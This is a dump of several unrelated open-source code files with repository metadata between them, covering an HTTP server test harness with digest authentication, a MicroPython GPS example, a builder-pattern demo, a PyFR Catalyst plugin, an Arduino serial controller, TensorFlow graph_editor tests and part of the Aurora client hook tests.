if error:
return -1
else:
if item in self.reply:
return -1
def _check_result (self):
if self.reply_err != self.expected_error:
return -1
if self.expected_content != None:
if type(self.expected_content) in (types.StringType, types.UnicodeType):
r = self._check_result_expected_item (self.expected_content)
if r == -1:
return -1
elif type(self.expected_content) == types.ListType:
for entry in self.expected_content:
r = self._check_result_expected_item (entry)
if r == -1:
return -1
else:
raise Exception("Syntax error")
if self.forbidden_content != None:
if type(self.forbidden_content) in (types.StringType, types.UnicodeType):
r = self._check_result_forbidden_item (self.forbidden_content)
if r == -1:
return -1
elif type(self.forbidden_content) == types.ListType:
for entry in self.forbidden_content:
r = self._check_result_forbidden_item (entry)
if r == -1:
return -1
else:
raise Exception("Syntax error")
r = self.CustomTest()
if r == -1:
return -1
return 0
def Clean (self):
self._initialize()
def Precondition (self):
return True
def Prepare (self, www):
None
def JustBefore (self, www):
None
def JustAfter (self, www):
None
def CustomTest (self):
return 0
def Run (self, host, port, ssl):
self._do_request(host, port, ssl)
self._parse_output()
return self._check_result()
def __str__ (self):
src = "\tName = %s\n" % (self.name)
if self.version == 9:
src += "\tProtocol = HTTP/0.9\n"
elif self.version == 0:
src += "\tProtocol = HTTP/1.0\n"
elif self.version == 1:
src += "\tProtocol = HTTP/1.1\n"
if self.conf is not None:
src += "\tConfig = %s\n" % (self.conf)
header_full = string.split (self.reply, "\r\n\r\n")[0]
headers = string.split (header_full, "\r\n")
requests = string.split (self.request, "\r\n")
src += "\tRequest = %s\n" % (requests[0])
for request in requests[1:]:
if len(request) > 1:
src += "\t\t%s\n" %(request)
if self.post is not None and not self.nobody:
src += "\tPost = %s\n" % (self.post)
if self.expected_error is not None:
src += "\tExpected = Code: %d\n" % (self.expected_error)
else:
src += "\tExpected = Code: UNSET!\n"
if self.expected_content is not None:
src += "\tExpected = Content: %s\n" % (self.expected_content)
if self.forbidden_content is not None:
src += "\tForbidden= Content: %s\n" % (self.forbidden_content)
src += "\tReply = %s\n" % (headers[0])
for header in headers[1:]:
src += "\t\t%s\n" %(header)
if not self.nobody:
body = self.reply[len(header_full)+4:]
src += "\tBody len = %d\n" % (len(body))
src += "\tBody = %s\n" % (body)
return src
def Mkdir (self, www, dir, mode=0777):
fulldir = os.path.join (www, dir)
os.makedirs(fulldir, mode)
return fulldir
def WriteFile (self, www, filename, mode=0444, content=''):
assert(type(mode) == int)
fullpath = os.path.join (www, filename)
f = open (fullpath, 'w')
f.write (content)
f.close()
os.chmod(fullpath, mode)
return fullpath
def SymLink (self, source, target):
os.symlink (source, target)
def CopyFile (self, src, dst):
open (dst, 'w').write (open (src, 'r').read())
def Remove (self, www, filename):
fullpath = os.path.join (www, filename)
if os.path.isfile(fullpath):
os.unlink (fullpath)
else:
from shutil import rmtree
try:
rmtree (fullpath)
except: pass
def WriteTemp (self, content):
while True:
name = self.tmp + "/%s" % (letters_random(40))
if not os.path.exists(name): break
f = open (name, "w+")
f.write (content)
f.close()
return name
class Digest:
def __init__ (self):
self.response = None
self.vals = {}
def ParseHeader (self, reply):
ret = {"cnonce":"",
"nonce":"",
"qop":"",
"nc":""}
pos1 = reply.find ("WWW-Authenticate: Digest ") + 25
pos2 = reply.find ("\r", pos1)
line = reply[pos1:pos2]
for item in line.split(", "):
pos = item.find("=")
name = item[:pos]
value = item[pos+1:]
if value[0] == '"':
value = value[1:]
if value[-1] == '"':
value = value[:-1]
ret[name] = value
return ret
def CalculateResponse (self, user, realm, passwd, method, url, nonce, qop, cnonce, nc):
try:
from hashlib import md5
except ImportError:
from md5 import md5
md5obj = md5()
md5obj.update("%s:%s:%s" % (user, realm, passwd))
a1 = md5obj.hexdigest()
md5obj = md5()
md5obj.update("%s:%s" % (method, url))
ha2 = md5obj.hexdigest()
md5obj = md5()
md5obj.update("%s:%s:" % (a1, nonce))
if qop != None:
md5obj.update("%s:" %(nc))
md5obj.update("%s:" %(cnonce))
md5obj.update("%s:" %(qop))
md5obj.update(ha2)
final = md5obj.hexdigest()
return final
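 # For reference, the computation above follows the RFC 2617 digest scheme
 # (names refer to the parameters of CalculateResponse):
 #
 #   A1 = MD5(user ":" realm ":" passwd)
 #   HA2 = MD5(method ":" url)
 #   response = MD5(A1 ":" nonce ":" [nc ":" cnonce ":" qop ":"] HA2)
 #
 # The bracketed fields are only mixed in when the server advertised a "qop"
 # value, which matches the conditional block above.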
def Precondition_UserHome (self, home_subdir="public_html"):
try:
user = os.getlogin()
except OSError:
return False
home = os.path.expanduser("~")
if not home:
return False
public_html = os.path.join (home, home_subdir)
# Look for the public_html directory
if not os.path.exists(public_html):
return False
return public_html, user
class TestCollection:
def __init__ (self):
self.tests = []
self.num = 0
self.disabled = False
def Add (self, test):
self.num += 1
if (test.name == None) or len(test.name) == 0:
test.name = self.name + ", Part %d" % (self.num)
test.tmp = self.tmp
test.nobody = self.nobody
test.php_conf = self.php_conf
test.proxy_suitable = self.proxy_suitable
self.tests.append (test)
return test
def Clean (self):
for t in self.tests:
self.current_test = t
t.Clean()
def Precondition (self):
for t in self.tests:
self.current_test = t
if t.Precondition() == False:
return False
return True
def Prepare (self, www):
for t in self.tests:
self.current_test = t
t.Prepare(www)
def JustBefore (self, www):
for t in self.tests:
self.current_test = t
t.JustBefore(www)
def JustAfter (self, www):
current = self.current_test
for t in self.tests:
self.current_test = t
t.JustAfter(www)
self.current_test = current
def Run (self, host, port, ssl):
for t in self.tests:
self.current_test = t
r = t.Run(host, port, ssl)
if r == -1: return r
return r
def __str__ (self):
return str(self.current_test)
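# Illustrative sketch (not from the original suite): a minimal test module
# written against the TestBase conventions above. The test name, request path
# and expected values are hypothetical placeholders.
#
# class Test (TestBase):
#     def __init__ (self):
#         TestBase.__init__ (self, __file__)
#         self.name             = "Example: static file"
#         self.request          = "GET /example/file.txt HTTP/1.0\r\n"
#         self.expected_error   = 200
#         self.expected_content = "file contents"
#
#     def Prepare (self, www):
#         d = self.Mkdir (www, "example")
#         self.WriteFile (d, "file.txt", 0444, "file contents")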
| gpl-2.0 | 1,023,215,754,151,048,200 | 27.293454 | 106 | 0.476863 | false |
inmcm/micropyGPS | pyboard/GPIO_interrupt_updater.py | 1 | 1474 | from pyb import UART
from pyb import ExtInt
from pyb import Pin
from micropyGPS import MicropyGPS
# Global Flag to Start GPS data Processing
new_data = False
# Callback Function
def pps_callback(line):
print("Updated GPS Object...")
global new_data # Use Global to trigger update
new_data = True
print('GPS Interrupt Tester')
# Instantiate the micropyGPS object
my_gps = MicropyGPS()
# Setup the connection to your GPS here
# This example uses UART 3 with RX on pin Y10
# Baudrate is 9600bps, with the standard 8 bits, 1 stop bit, no parity
# Also made the buffer size very large (1000 chars) to accommodate all the characters that stack up
# each second
uart = UART(3, 9600, read_buf_len=1000)
# Create an external interrupt on pin X8
pps_pin = pyb.Pin.board.X8
extint = pyb.ExtInt(pps_pin, pyb.ExtInt.IRQ_FALLING, pyb.Pin.PULL_UP, pps_callback)
# Main Infinite Loop
while 1:
# Do Other Stuff Here.......
# Update the GPS Object when flag is tripped
if new_data:
while uart.any():
my_gps.update(chr(uart.readchar())) # Note the conversion to to chr, UART outputs ints normally
print('UTC Timestamp:', my_gps.timestamp)
print('Date:', my_gps.date_string('long'))
print('Latitude:', my_gps.latitude_string())
print('Longitude:', my_gps.longitude_string())
print('Horizontal Dilution of Precision:', my_gps.hdop)
print()
new_data = False # Clear the flag
| mit | 5,018,743,199,084,742,000 | 30.361702 | 108 | 0.685889 | false |
kkaushik24/python-design-patterns | creational/builder_pattern.py | 1 | 2207 | from abc import ABCMeta, abstractmethod
class Item():
__metaclass__ = ABCMeta
@abstractmethod
def name(self):
pass
@abstractmethod
def packing(self):
pass
@abstractmethod
def price(self):
pass
class Packing():
__metaclass__ = ABCMeta
@abstractmethod
def pack(self):
pass
class Wrapper(Packing):
def pack(self):
return 'Wrapper'
class Bottle(Packing):
def pack(self):
return 'Bottle'
class Burger(Item):
def packing(self):
return Wrapper()
class ColdDrink(Item):
def packing(self):
return Bottle()
class VegBurger(Burger):
def name(self):
return 'VegBurger'
def price(self):
return 25
class ChickenBurger(Burger):
def name(self):
return 'ChickenBruger'
def price(self):
return 50
class Coke(ColdDrink):
def name(self):
return 'Coke'
def price(self):
return 10
class Pepsi(ColdDrink):
def name(self):
return 'Pepsi'
def price(self):
return 20
class Meal():
def __init__(self):
self.item_list = []
def add_item(self, item):
self.item_list.append(item)
def get_cost(self):
total_cost = 0
for item in self.item_list:
total_cost = total_cost + item.price()
return total_cost
def show_items(self):
print 'name packing cost'
for item in self.item_list:
print item.name(), item.packing().pack(), item.price()
class MealBuilder():
def prepare_veg_meal(self):
meal = Meal()
meal.add_item(VegBurger())
meal.add_item(Coke())
return meal
def prepare_nonveg_meal(self):
meal = Meal()
meal.add_item(ChickenBurger())
meal.add_item(Pepsi())
return meal
if __name__ == "__main__":
meal_builder = MealBuilder()
veg_meal = meal_builder.prepare_veg_meal()
print 'veg meal'
veg_meal.show_items()
print veg_meal.get_cost()
nonveg_meal = meal_builder.prepare_nonveg_meal()
print 'nonveg meal'
nonveg_meal.show_items()
print nonveg_meal.get_cost()
| apache-2.0 | 1,464,812,849,426,969,900 | 15.227941 | 66 | 0.572723 | false |
tjcorona/PyFR | pyfr/plugins/catalyst.py | 1 | 7516 | # -*- coding: utf-8 -*-
from ctypes import *
from mpi4py import MPI
import numpy as np
from pyfr.plugins.base import BasePlugin
from pyfr.ctypesutil import load_library
from pyfr.shapes import BaseShape
from pyfr.util import proxylist, subclass_where
import os
# Contains relevant data pertaining to all instances of a single cell type
class MeshDataForCellType(Structure):
_fields_ = [
('nVerticesPerCell', c_int),
('nCells', c_int),
('vertices', c_void_p),
('nSubdividedCells', c_int),
('con', c_void_p),
('off', c_void_p),
('type', c_void_p)
]
class SolutionDataForCellType(Structure):
_fields_ = [
('ldim', c_int),
('lsdim', c_int),
('soln', c_void_p)
]
class CatalystData(Structure):
_fields_ = [
('nCellTypes', c_int),
('meshData', POINTER(MeshDataForCellType)),
('solutionData', POINTER(SolutionDataForCellType))
]
class CatalystPlugin(BasePlugin):
name = 'catalyst'
systems = ['euler', 'navier-stokes']
def __init__(self, intg, *args, **kwargs):
super().__init__(intg, *args, **kwargs)
self.divisor = self.cfg.getint(self.cfgsect, 'divisor', 3)
self.nsteps = self.cfg.getint(self.cfgsect, 'nsteps')
outputfile = self.cfg.get(self.cfgsect, 'outputfile')
c_outputfile = create_string_buffer(bytes(outputfile, encoding='utf_8'))
# hostname = self.cfg.get(self.cfgsect, 'hostname')
hostname = os.environ.get('PYFR_CLIENT_HOSTNAME', '')
c_hostname = create_string_buffer(bytes(hostname, encoding='utf_8'))
port = self.cfg.getint(self.cfgsect, 'port')
prec = self.cfg.get('backend', 'precision', 'double')
if prec == 'double':
self.catalyst = load_library('pyfr_catalyst_fp64')
else:
self.catalyst = load_library('pyfr_catalyst_fp32')
###################
self.backend = backend = intg.backend
self.mesh = intg.system.mesh
# Amount of subdivision to perform
# comm = MPI.COMM_WORLD
# self.divisor = comm.Get_size()
# Allocate a queue on the backend
self._queue = backend.queue()
# Solution arrays
self.eles_scal_upts_inb = inb = intg.system.eles_scal_upts_inb
# Prepare the mesh data and solution data
meshData, solnData, kerns = [], [], []
for etype, solnmat in zip(intg.system.ele_types, inb):
p, solnop = self._prepare_vtu(etype, intg.rallocs.prank)
# Allocate on the backend
vismat = backend.matrix((p.nVerticesPerCell, self.nvars, p.nCells),
tags={'align'})
solnop = backend.const_matrix(solnop)
backend.commit()
# Populate the soln field and dimension info
s = SolutionDataForCellType(ldim = vismat.leaddim,
lsdim = vismat.leadsubdim,
soln = vismat.data)
# Prepare the matrix multiplication kernel
k = backend.kernel('mul', solnop, solnmat, out=vismat)
# Append
meshData.append(p)
solnData.append(s)
kerns.append(k)
# Save the pieces
catalystData = []
catalystData.append(
CatalystData(nCellTypes = len(meshData),
meshData = (MeshDataForCellType*len(meshData))(*meshData),
solutionData = (SolutionDataForCellType*len(solnData))(*solnData)))
self._catalystData = (CatalystData*len(catalystData))(*catalystData)
# Wrap the kernels in a proxy list
self._interpolate_upts = proxylist(kerns)
# Finally, initialize Catalyst
self._data = self.catalyst.CatalystInitialize(c_hostname,
port,
c_outputfile,
self._catalystData)
def _prepare_vtu(self, etype, part):
from pyfr.writers.paraview import BaseShapeSubDiv
mesh = self.mesh['spt_{0}_p{1}'.format(etype, part)]
# Get the shape and sub division classes
shapecls = subclass_where(BaseShape, name=etype)
subdvcls = subclass_where(BaseShapeSubDiv, name=etype)
# Dimensions
# tjc: nspts: number of points in the element type
# tjc: neles: number of elements of this type
nspts, neles = mesh.shape[:2]
# Sub division points inside of a standard element
svpts = shapecls.std_ele(self.divisor)
nsvpts = len(svpts)
# Shape
soln_b = shapecls(nspts, self.cfg)
# Generate the operator matrices
mesh_vtu_op = soln_b.sbasis.nodal_basis_at(svpts)
soln_vtu_op = soln_b.ubasis.nodal_basis_at(svpts)
# Calculate node locations of vtu elements
vpts = np.dot(mesh_vtu_op, mesh.reshape(nspts, -1))
vpts = vpts.reshape(nsvpts, -1, self.ndims)
# Append dummy z dimension for points in 2D
if self.ndims == 2:
vpts = np.pad(vpts, [(0, 0), (0, 0), (0, 1)], 'constant')
# Reorder and cast
vpts = vpts.swapaxes(0, 1).astype(self.backend.fpdtype, order='C')
# Perform the sub division
nodes = subdvcls.subnodes(self.divisor)
# Prepare vtu cell arrays
vtu_con = np.tile(nodes, (neles, 1))
vtu_con += (np.arange(neles)*nsvpts)[:, None]
vtu_con = vtu_con.astype(np.int32, order='C')
# Generate offset into the connectivity array
vtu_off = np.tile(subdvcls.subcelloffs(self.divisor), (neles, 1))
vtu_off += (np.arange(neles)*len(nodes))[:, None]
vtu_off = vtu_off.astype(np.int32, order='C')
# Tile vtu cell type numbers
vtu_typ = np.tile(subdvcls.subcelltypes(self.divisor), neles)
vtu_typ = vtu_typ.astype(np.uint8, order='C')
# Construct the meshDataForCellType
meshDataForCellType = \
MeshDataForCellType(nVerticesPerCell=nsvpts,
nCells=neles,
vertices=vpts.ctypes.data_as(c_void_p),
nSubdividedCells=len(vtu_typ),
con=vtu_con.ctypes.data,
off=vtu_off.ctypes.data,
type=vtu_typ.ctypes.data)
# Retain the underlying NumPy objects
meshDataForCellType._vpts = vpts
meshDataForCellType._vtu_con = vtu_con
meshDataForCellType._vtu_off = vtu_off
meshDataForCellType._vtu_typ = vtu_typ
return meshDataForCellType, soln_vtu_op
def __call__(self, intg):
if np.isclose(intg.tcurr,intg.tend):
# Configure the input bank
self.eles_scal_upts_inb.active = intg._idxcurr
# Interpolate to the vis points
self._queue % self._interpolate_upts()
self.catalyst.CatalystCoProcess(c_double(intg.tcurr),intg.nacptsteps,self._data,c_bool(True))
self.catalyst.CatalystFinalize(self._data)
return
if intg.nacptsteps % self.nsteps:
return
# Configure the input bank
self.eles_scal_upts_inb.active = intg._idxcurr
# Interpolate to the vis points
self._queue % self._interpolate_upts()
self.catalyst.CatalystCoProcess(c_double(intg.tcurr),intg.nacptsteps,self._data)
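# Illustrative sketch (not part of the plugin): the configuration keys read in
# __init__ above, as they might appear in a PyFR .ini file. The section name
# and all values are hypothetical placeholders; the hostname is normally taken
# from the PYFR_CLIENT_HOSTNAME environment variable instead.
#
#   [soln-plugin-catalyst]
#   nsteps = 50
#   divisor = 3
#   outputfile = out.vtm
#   port = 22222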
| bsd-3-clause | -1,598,465,594,740,299,800 | 34.45283 | 105 | 0.577967 | false |
DaveBuckingham/robosoft | mctransmitter.py | 1 | 3109 | #
# TRANSMITS COMMANDS TO THE ARDUINO OVER SERIAL
#
import os
import sys
import time
import serial
import struct
import global_data
import record_mode
TRANSMIT_DELAY = 0.08 # SECONDS
# SET TO FALSE FOR TESTING WITHOUT ARDUINO
TRANSMIT = True
# THIS WILL GET ASSIGNED DURING INITIALIZATION
CONNECTION = None
##############################
# INITIALIZE COM #
##############################
# INITIALIZE SERIAL CONNECTION
def initialize():
global CONNECTION
if (TRANSMIT):
if (os.name == 'posix'):
port_name = '/dev/ttyACM0'
else:
port_name = 'COM4'
CONNECTION = serial.Serial(
port=port_name,
baudrate=9600,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=0 # don't block when reading
)
##############################
# CLOSE COM #
##############################
# PROBABLY NEVER NEED TO CALL THIS
def close():
CONNECTION.close()
##############################
# TRANSMIT #
##############################
# DIGITAL TX
# 2 DIGITAL PINS SO pin_index IN [0,1]
# BINARY STATE SO value IN [True, False]
def tx_digital(pin_index, value):
if (not isinstance(value, bool)):
sys.exit("Non-boolean value arg to tx_digital")
packed = struct.pack('!cB?', 'd', pin_index, value)
if (global_data.record):
record_mode.append_instruction(('d', pin_index, value))
if (TRANSMIT):
CONNECTION.write(packed)
if (pin_index == 0):
global_data.digital_0_sent = value
elif (pin_index == 1):
global_data.digital_1_sent = value
#receive()
# ANALOG TX
# 2 ANALOG PINS SO pin_index IN [0,1]
# value IN [0, 255]
def tx_analog(pin_index, value):
if (not isinstance(value, int)):
sys.exit("Non-int value arg to tx_digital: {}".format(value))
packed = struct.pack('!cBB', 'a', pin_index, value)
if (global_data.record):
record_mode.append_instruction(('a', pin_index, value))
if (TRANSMIT):
CONNECTION.write(packed)
if (pin_index == 0):
global_data.analog_0_sent = value
elif (pin_index == 1):
global_data.analog_1_sent = value
#receive()
# GAIT TX
def tx_gait(event_list):
packed = struct.pack('!c', 't')
if (TRANSMIT):
CONNECTION.write(packed)
for event in event_list:
time.sleep(TRANSMIT_DELAY)
packed = struct.pack('!BLBB', event['motor_index'], event['activation_time'], event['direction'], event['pwm'])
if (TRANSMIT):
CONNECTION.write(packed)
#print CONNECTION.readline()
#def tx_reset():
# packed = struct.pack('!c', 'r')
# if (TRANSMIT):
# CONNECTION.write(packed)
##############################
# RECEIVE #
##############################
# READ RESPONSE FROM ARDUINO AND
# SET VARIABLES IN global_data.py
def receive():
line = CONNECTION.readline()
if (len(line) > 0):
sys.stdout.write(line);
#print line;
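# Illustrative usage sketch (not part of the module); pin indices and values
# below are hypothetical:
#
#   initialize()                  # open the serial link (no-op if TRANSMIT is False)
#   tx_digital(0, True)           # drive digital pin 0 high
#   tx_analog(1, 128)             # set analog pin 1 to mid-scale
#   tx_gait([{'motor_index': 0, 'activation_time': 500,
#             'direction': 1, 'pwm': 200}])     # send a single gait event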
| mit | -8,217,914,187,891,279,000 | 23.674603 | 119 | 0.548729 | false |
pierreg/tensorflow | tensorflow/contrib/graph_editor/tests/util_test.py | 28 | 5696 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.contrib.graph_editor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.contrib import graph_editor as ge
class UtilTest(tf.test.TestCase):
def test_list_view(self):
"""Test for ge.util.ListView."""
l = [0, 1, 2]
lv = ge.util.ListView(l)
# Should not be the same id.
self.assertIsNot(l, lv)
# Should behave the same way than the original list.
self.assertTrue(len(lv) == 3 and lv[0] == 0 and lv[1] == 1 and lv[2] == 2)
# Should be read only.
with self.assertRaises(TypeError):
lv[0] = 0
def test_is_iterable(self):
"""Test for ge.util.is_iterable."""
self.assertTrue(ge.util.is_iterable([0, 1, 2]))
self.assertFalse(ge.util.is_iterable(3))
def test_unique_graph(self):
"""Test for ge.util.check_graphs and ge.util.get_unique_graph."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1)
b0 = tf.constant(2)
g1 = tf.Graph()
with g1.as_default():
a1 = tf.constant(1)
b1 = tf.constant(2)
# Same graph, should be fine.
self.assertIsNone(ge.util.check_graphs(a0, b0))
# Two different graphs, should assert.
with self.assertRaises(ValueError):
ge.util.check_graphs(a0, b0, a1, b1)
# a0 and b0 belongs to the same graph, should be fine.
self.assertEqual(ge.util.get_unique_graph([a0, b0]), g0)
# Different graph, should raise an error.
with self.assertRaises(ValueError):
ge.util.get_unique_graph([a0, b0, a1, b1])
def test_make_list_of_op(self):
"""Test for ge.util.make_list_of_op."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1)
b0 = tf.constant(2)
# Should extract the ops from the graph.
self.assertEqual(len(ge.util.make_list_of_op(g0)), 2)
# Should extract the ops from the tuple.
self.assertEqual(len(ge.util.make_list_of_op((a0.op, b0.op))), 2)
def test_make_list_of_t(self):
"""Test for ge.util.make_list_of_t."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1)
b0 = tf.constant(2)
c0 = tf.add(a0, b0) # pylint: disable=unused-variable
# Should extract the tensors from the graph.
self.assertEqual(len(ge.util.make_list_of_t(g0)), 3)
# Should extract the tensors from the tuple
self.assertEqual(len(ge.util.make_list_of_t((a0, b0))), 2)
# Should extract the tensors and ignore the ops.
self.assertEqual(
len(ge.util.make_list_of_t((a0, a0.op, b0), ignore_ops=True)), 2)
def test_get_generating_consuming(self):
"""Test for ge.util.get_generating_ops and ge.util.get_generating_ops."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1)
b0 = tf.constant(2)
c0 = tf.add(a0, b0)
self.assertEqual(len(ge.util.get_generating_ops([a0, b0])), 2)
self.assertEqual(len(ge.util.get_consuming_ops([a0, b0])), 1)
self.assertEqual(len(ge.util.get_generating_ops([c0])), 1)
self.assertEqual(ge.util.get_consuming_ops([c0]), [])
def test_control_outputs(self):
"""Test for the ge.util.ControlOutputs class."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1)
b0 = tf.constant(2)
x0 = tf.constant(3)
with tf.control_dependencies([x0.op]):
c0 = tf.add(a0, b0) # pylint: disable=unused-variable
control_outputs = ge.util.ControlOutputs(g0).get_all()
self.assertEqual(len(control_outputs), 1)
self.assertEqual(len(control_outputs[x0.op]), 1)
self.assertIs(list(control_outputs[x0.op])[0], c0.op)
def test_scope(self):
"""Test simple path scope functionalities."""
self.assertEqual(ge.util.scope_finalize("foo/bar"), "foo/bar/")
self.assertEqual(ge.util.scope_dirname("foo/bar/op"), "foo/bar/")
self.assertEqual(ge.util.scope_basename("foo/bar/op"), "op")
def test_placeholder(self):
"""Test placeholder functionalities."""
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1, name="foo")
# Test placeholder name.
self.assertEqual(ge.util.placeholder_name(a0), "geph__foo_0")
self.assertEqual(ge.util.placeholder_name(None), "geph")
self.assertEqual(
ge.util.placeholder_name(a0, scope="foo/"), "foo/geph__foo_0")
self.assertEqual(
ge.util.placeholder_name(a0, scope="foo"), "foo/geph__foo_0")
self.assertEqual(ge.util.placeholder_name(None, scope="foo/"), "foo/geph")
self.assertEqual(ge.util.placeholder_name(None, scope="foo"), "foo/geph")
# Test placeholder creation.
g0 = tf.Graph()
with g0.as_default():
a0 = tf.constant(1, dtype=tf.float32, name="a0")
c0 = tf.add(
ge.util.make_placeholder_from_tensor(a0),
ge.util.make_placeholder_from_dtype_and_shape(dtype=tf.float32))
self.assertEqual(c0.op.inputs[0].op.name, "geph__a0_0")
self.assertEqual(c0.op.inputs[1].op.name, "geph")
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | 4,765,823,526,182,708,000 | 37.228188 | 80 | 0.642381 | false |
WimPessemier/OntoManager | ontomanager/ontomanager/triplestore.py | 1 | 4899 | """
Module containing some functions related to the triple store (the global graph).
"""
import os
import rdflib
import fnmatch
import context
from logging import DEBUG, INFO, ERROR
import pprint
PPRINTER = pprint.PrettyPrinter(depth=6)
###################################################################################################
# the global instance of the graph. Should not be accessed directly outside this module.
__global_graph__ = None
###################################################################################################
def GET_GRAPH():
"""
Get a reference to the global graph.
"""
return __global_graph__
def CREATE_GRAPH():
"""
Create the global graph.
"""
global __global_graph__
try:
__global_graph__ = rdflib.ConjunctiveGraph()
except:
__global_graph__ = rdflib.graph.ConjunctiveGraph()
def CLEAR_GRAPH():
"""
Clear the global graph.
"""
global __global_graph__
INFO("CLEARING (triples: %d)" %len(__global_graph__))
CREATE_GRAPH()
INFO("CLEARED (triples: %d)" %len(__global_graph__))
def LOAD_MINIMAL_CONTEXT():
"""
Load the minimal context, so that the queries defined in the templates get a meaning
(and don't raise exceptions because of unknown namespaces).
An example of a context item is:
prefix "sys" = Namespace("http://www.mercator.iac.es/onto/metamodels/systems"))
"""
global __global_graph__
for (prefix,uri) in context.MINIMAL_CONTEXT.items():
__global_graph__.namespace_manager.bind(prefix, rdflib.namespace.Namespace(uri))
def FIND_FILES(directory, pattern):
"""
Find the files that match a given pattern, in a given directory.
"""
for root, dirs, files in os.walk(directory):
for basename in files:
if fnmatch.fnmatch(basename, pattern):
filename = os.path.join(root, basename)
yield filename
def CONTEXT():
"""
Get the context of the global graph, as a dictionary of key=prefix and value=URI.
"""
global __global_graph__
d = {}
for prefix, uri in __global_graph__.namespace_manager.namespaces():
d[prefix] = uri
return d
def LOG_CONTEXT():
"""
Log the context as INFO.
"""
global __global_graph__
INFO("CONTEXT:")
c = CONTEXT()
for prefix, uri in c.items():
INFO(" %s : %s" %(prefix, uri))
INFO("TRIPLES LOADED: %d" %len(__global_graph__))
def QUERY(text):
"""
Execute a query.
"""
strippedText = text.strip()
for line in strippedText.split('\n'):
DEBUG(" %s" %line)
results = __global_graph__.query(strippedText)
DEBUG("Results:")
if len(results) >0:
for result in results:
DEBUG(result)
else:
DEBUG(" 0 found")
if results is None:
results = []
return results
def URI_TO_QNAME(uri):
"""
Convert the given URI to a qname, using the context of the global graph.
"""
try:
if str(uri).find("://") != -1:
return __global_graph__.namespace_manager.qname(unicode(str(uri)))
else:
raise Exception("Doesn't appear to be a valid URI!")
except Exception, e:
raise Exception("Couldn't convert '%s' to a QName: %s" %(uri,e))
def URI_TO_IDENTIFIER(uri):
"""
Return the identifier part of an URI (e.g. return 'b' for 'http://blabla.com/bla#b').
"""
separator = str(uri).find('#')
if separator > 0:
return str(uri)[separator + 1:]
else:
raise Exception("URI %s doesn't contain an identifier" %uri)
def QNAME_TO_URI(qname):
"""
Convert the given qname to an URI, based on the context of the global graph.
"""
for prefix, uri in __global_graph__.namespace_manager.namespaces():
if qname.find(prefix + ":") == 0:
return uri + qname[len(prefix)+1:]
else:
raise Exception("QName %s is unknown" %qname)
def IS_QNAME(x):
"""
Check if the given string is a qname.
"""
return len(x.split(':')) == 2
def IS_URI(x):
"""
Check if the given string is an URI.
"""
return isinstance(x, rdflib.URIRef)
def IS_LITERAL(x):
"""
Check if the given string is a literal.
"""
return isinstance(x, rdflib.Literal)
def PARSE_FOR_URI(s):
"""
Convert URI occurrences in a string to an HTML hyperlink for the browse view.
"""
# max 10 iterations:
for i in xrange(10):
httpStart = s.find("http://")
if httpStart >= 0:
httpEnd = s.find(" ", httpStart)
if httpEnd < 0:
httpEnd = len(s)
uri = s[httpStart:httpEnd]
qname = URI_TO_QNAME(uri)
html = "<a href=browse?show;qname=%s>%s</a>" %(qname,qname)
s = s.replace(uri, html)
else:
break
return s
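# Illustrative usage sketch (not part of the module); the qname used below is
# a hypothetical example and assumes its prefix is defined in MINIMAL_CONTEXT:
#
#   CREATE_GRAPH()
#   LOAD_MINIMAL_CONTEXT()
#   uri   = QNAME_TO_URI("sys:SomeClass")   # expand a prefixed name
#   qname = URI_TO_QNAME(uri)               # and collapse it back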
| gpl-3.0 | -132,449,730,624,846,110 | 24.252577 | 99 | 0.564809 | false |
kidaa/aurora | src/test/python/apache/aurora/client/cli/test_command_hooks.py | 7 | 5573 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from mock import patch
from twitter.common.contextutil import temporary_file
from apache.aurora.client.cli.client import AuroraCommandLine
from apache.aurora.client.cli.command_hooks import CommandHook, GlobalCommandHookRegistry
from apache.aurora.config import AuroraConfig
from .util import AuroraClientCommandTest, FakeAuroraCommandContext
from gen.apache.aurora.api.ttypes import (
JobKey,
Result,
ScheduleStatus,
ScheduleStatusResult,
TaskQuery
)
class HookForTesting(CommandHook):
def __init__(self, succeed):
self.succeed = succeed
self.ran_pre = False
self.ran_post = False
@property
def name(self):
return "test_hook"
def get_nouns(self):
return ["job"]
def get_verbs(self, noun):
if noun == "job":
return ["create", "status"]
else:
return []
def pre_command(self, noun, verb, context, commandline):
self.ran_pre = True
if self.succeed:
return 0
else:
return 1
def post_command(self, noun, verb, context, commandline, result):
self.ran_post = True
class TestClientCreateCommand(AuroraClientCommandTest):
@classmethod
def create_mock_status_query_result(cls, scheduleStatus):
query_result = cls.create_simple_success_response()
if scheduleStatus == ScheduleStatus.INIT:
# status query result for before job is launched.
tasks = []
else:
task_one = cls.create_scheduled_task(0, initial_time=1000, status=scheduleStatus)
task_two = cls.create_scheduled_task(1, initial_time=1004, status=scheduleStatus)
tasks = [task_one, task_two]
query_result.result = Result(scheduleStatusResult=ScheduleStatusResult(tasks=tasks))
return query_result
@classmethod
def create_query(cls):
return TaskQuery(
jobKeys=[JobKey(role=cls.TEST_ROLE, environment=cls.TEST_ENV, name=cls.TEST_JOB)])
@classmethod
def get_createjob_response(cls):
# Then, we call api.create_job(config)
return cls.create_simple_success_response()
@classmethod
